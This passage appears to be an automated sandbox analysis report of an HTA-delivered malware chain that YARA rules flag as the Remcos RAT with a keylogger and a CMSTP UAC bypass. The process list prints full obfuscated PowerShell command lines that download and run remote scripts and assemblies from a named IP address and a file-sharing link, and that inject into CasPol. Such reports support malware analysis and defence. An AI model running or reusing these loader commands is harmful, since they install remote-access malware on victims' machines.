                                                                            2024-11-26 08:44:26 UTC8192INData Raw: 8d c1 55 ba 8e bc e0 a4 d3 19 81 40 79 ed 58 6d 4c 51 79 eb 09 52 59 b9 b3 db 39 d9 20 84 c8 8e 16 48 d8 10 a7 a9 c0 a4 7a 39 1a 0d a6 42 8d d3 60 00 5d 77 38 b4 41 e0 9a 4a 76 37 e9 dc 3b e6 aa eb 23 75 90 95 06 46 5d c5 87 7b 1d 33 30 80 aa bd ec 13 5e f8 06 82 4f 2a 55 46 da 41 36 77 0e 4e 5b 5e ac da 80 e1 6d 5b b1 3d 31 78 2d e6 de 50 d0 15 64 e6 93 2e f4 50 79 f8 fb 60 66 24 76 f6 76 ad 1e 2f 1e f2 ca c6 18 a8 b2 0d 62 da 95 65 70 a1 36 95 3d 71 a2 ce da 51 34 6a 59 bf 0b 83 fc c6 02 64 b5 ae f2 b4 3d ba e7 15 0c 4b 0a af 8e 56 30 5d c9 0a b5 d3 e5 8d 04 55 4d a1 4b 37 7a 38 11 0c 8d a5 62 ec 54 10 0d 51 ba 3f 4c b8 95 66 8c cc 5f 93 f1 e8 71 32 83 d4 ce 83 71 24 d0 1f 2c 13 35 50 28 28 74 03 fa e0 3b 0c e5 4f a9 81 be a0 65 43 87 72 c4 f2 3a 62 65
                                                                            Data Ascii: U@yXmLQyRY9 Hz9B`]w8AJv7;#uF]{30^O*UFA6wN[^m[=1x-Pd.Py`f$vv/bep6=qQ4jYd=KV0]UMK7z8bTQ?Lf_q2q$,5P((t;OeCr:be
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: 58 42 b3 85 56 12 28 ea c1 48 07 9f 8f 3f 9e 09 9d d0 90 c2 88 f8 7f 5c a2 02 e7 a8 06 89 b3 f0 e7 01 aa 56 31 90 c0 06 50 5e ff 00 84 dd 57 d7 af d7 28 8d b6 c2 dd 73 5e c7 05 0b 5b 10 f6 45 5e 31 1c 42 40 cc 17 6a a8 b1 80 2f 33 71 2b 44 91 ed 97 8b 4b b9 77 c8 48 27 b6 1a 2d 2a b3 07 66 fc 42 c6 41 5d 4c 6c 51 5a d7 f8 4f b6 04 cf 18 fb ab 79 62 c5 8b f7 cf 6d fb 2a 9a 05 d4 7d a1 89 9d 84 92 f8 26 a5 55 56 ef 8d a4 d5 77 a1 9e 17 cd 64 a8 ef 71 3c 1f 86 7b 2f d9 64 4b 2f db 73 a4 91 5c a6 af 47 a9 85 c2 7e 2a 31 b1 35 f1 e3 01 bd 4c cf 3f ed 9b c2 11 a5 57 92 1f 10 d0 23 37 a8 ee 65 58 54 9e 45 dd a9 bb cb 7e d3 67 31 3f 86 45 21 6d ca fe 24 4b 96 34 59 b5 73 0e 17 b7 41 84 f1 28 74 fa 2f db 84 1e 58 61 1f fb 4b 46 ea b4 4b 53 08 9b b9 eb ce 53 f6 ad
                                                                            Data Ascii: XBV(H?\V1P^W(s^[E^1B@j/3q+DKwH'-*fBA]LlQZOybm*}&UVwdq<{/dK/s\G~*15L?W#7eXTE~g1?E!m$K4YsA(t/XaKFKSS
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: 69 0b 35 a2 f2 78 ba c0 8d 34 86 25 89 1e f7 2b 80 dc fe 2e 0e 46 a3 52 e3 53 14 32 29 a2 e4 ee 04 51 5f 62 32 1e 02 8e 1c d9 da 68 fc ab ae 0e 48 dd 98 39 e4 83 6a 70 07 aa 55 01 5c bb 29 5d ca 42 fb 1e 9c 62 31 07 2b 3b 31 62 a0 0d bd bf d7 6c d2 97 6c ff 00 c2 40 ba 6b ae b8 b8 78 d5 5a 31 4c b6 47 18 09 19 1e 39 37 97 6a 65 04 01 d0 1a ac 89 b5 01 64 52 8c 7d 3c b7 5e 4e 56 68 c8 1b 40 3b 57 a0 f6 18 30 87 70 20 12 ac 2d 8d 74 ac 03 cf 38 9e 42 ca 68 ad 5f c3 9c 58 94 52 d2 93 ea dd f9 e7 2a 95 2c bb b8 3e ae 45 5f b6 55 54 f9 db 40 52 18 6e f9 1c 07 74 ce 8a b3 9d 95 fb a0 59 8e 3f 04 81 e1 49 17 80 62 06 ab e3 d7 13 d3 30 d3 ca 1e 65 66 47 3b 69 45 83 9a b0 4f a3 6b 20 90 a0 d2 a9 1d 30 32 8c 46 45 42 e1 9d 45 dc 7d fa e6 8e 89 52 2f 0e 54 92 e2 dc
                                                                            Data Ascii: i5x4%+.FRS2)Q_b2hH9jpU\)]Bb1+;1bll@kxZ1LG97jedR}<^NVh@;W0p -t8Bh_XR*,>E_UT@RntY?Ib0efG;iEOk 02FEBE}R/T


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:03:44:08
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:mshta.exe "C:\Users\user\Desktop\sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta"
                                                                            Imagebase:0xbb0000
                                                                            File size:13'312 bytes
                                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:03:44:09
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"
                                                                            Imagebase:0xc20000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:03:44:09
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:03:44:10
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt
                                                                            Imagebase:0xc20000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:03:44:14
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline"
                                                                            Imagebase:0xf00000
                                                                            File size:2'141'552 bytes
                                                                            MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:03:44:15
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF818.tmp" "c:\Users\user\AppData\Local\Temp\blaytqul\CSC6824B6AE21FF4F1D9A4E95662E7FF991.TMP"
                                                                            Imagebase:0x420000
                                                                            File size:46'832 bytes
                                                                            MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:03:44:21
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs"
                                                                            Imagebase:0xe30000
                                                                            File size:147'456 bytes
                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:03:44:21
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                            Imagebase:0xc20000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:03:44:21
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:9
                                                                            Start time:03:44:22
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"
                                                                            Imagebase:0xc20000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            Has exited:true

                                                                            Target ID:13
                                                                            Start time:03:44:47
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                            Imagebase:0x8c0000
                                                                            File size:108'664 bytes
                                                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.4110277483.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            Has exited:false

                                                                            Reset < >
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1672983251.00000000064C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_64c0000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                              • Instruction ID: e013fd4d408da2bd32ca7eb40781fe97a89a7e4ec22f50670455a74ea11294c7
                                                                              • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                              • Instruction Fuzzy Hash:
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1672983251.00000000064C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_64c0000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                              • Instruction ID: e013fd4d408da2bd32ca7eb40781fe97a89a7e4ec22f50670455a74ea11294c7
                                                                              • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                              • Instruction Fuzzy Hash:
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1672983251.00000000064C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_64c0000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                              • Instruction ID: e013fd4d408da2bd32ca7eb40781fe97a89a7e4ec22f50670455a74ea11294c7
                                                                              • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                              • Instruction Fuzzy Hash:
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1672983251.00000000064C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_64c0000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                              • Instruction ID: e013fd4d408da2bd32ca7eb40781fe97a89a7e4ec22f50670455a74ea11294c7
                                                                              • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                              • Instruction Fuzzy Hash:
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1827791146.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7310000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q
                                                                              • API String ID: 0-309238000
                                                                              • Opcode ID: ba8071269d6796bd95c0928efbea60cc47badde0caa544751f2f50a4f20f5103
                                                                              • Instruction ID: b7ea3ad4c82fcba8a3ceb960ea69694bb0b4dcb1be3caf03f4173bf566788c4c
                                                                              • Opcode Fuzzy Hash: ba8071269d6796bd95c0928efbea60cc47badde0caa544751f2f50a4f20f5103
                                                                              • Instruction Fuzzy Hash: 06F1EAB1B002099FDB18DF68C814AAABFE6BFC5710F248469E9099F351DE31DC46C791
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1827791146.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7310000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q$tP^q
                                                                              • API String ID: 0-309238000
                                                                              • Opcode ID: 0ed3931e6e9b2426df51d69619ff0b8cdb18122d1d7622aded48dbe8965a2b2d
                                                                              • Instruction ID: 66b6b8ab03f5635be8b8e1d9bfc6ccf4d37d0d379fe8586be6bed6f0fd369bd6
                                                                              • Opcode Fuzzy Hash: 0ed3931e6e9b2426df51d69619ff0b8cdb18122d1d7622aded48dbe8965a2b2d
                                                                              • Instruction Fuzzy Hash: F25136B1B04314AFDB289A688810B6ABFE6EFC9710F14841AE549DF381CA71DD85C7A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1827791146.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7310000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tP^q
                                                                              • API String ID: 0-2862610199
                                                                              • Opcode ID: 3baca0964a7fdcef1cf9fc54e56a89c66238cf30f6b9415df9d1989ef3a31c63
                                                                              • Instruction ID: 011e21df52f033b2cfefc738e10681dd110eb33bfe01097620a4432064fdbe29
                                                                              • Opcode Fuzzy Hash: 3baca0964a7fdcef1cf9fc54e56a89c66238cf30f6b9415df9d1989ef3a31c63
                                                                              • Instruction Fuzzy Hash: 6AA1E6B1A00209DBDB18DF58C444AAABBB2FF85710F258499EA099F351DB31EC46CB91
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1816312916.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_9bd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 73879cdd43993cb675a0e8d271a0b3ebd6907d00a495e86162873f200a77333f
                                                                              • Instruction ID: a5ad18fd11258feea396382e91a68a14e5f5a489ae173ba6aa26cf7d642d42a6
                                                                              • Opcode Fuzzy Hash: 73879cdd43993cb675a0e8d271a0b3ebd6907d00a495e86162873f200a77333f
                                                                              • Instruction Fuzzy Hash: DE012B3100B3009AE7105E25CE84BA7BF9CEF41334F18C829EC080F146D679D841C6B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1816312916.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
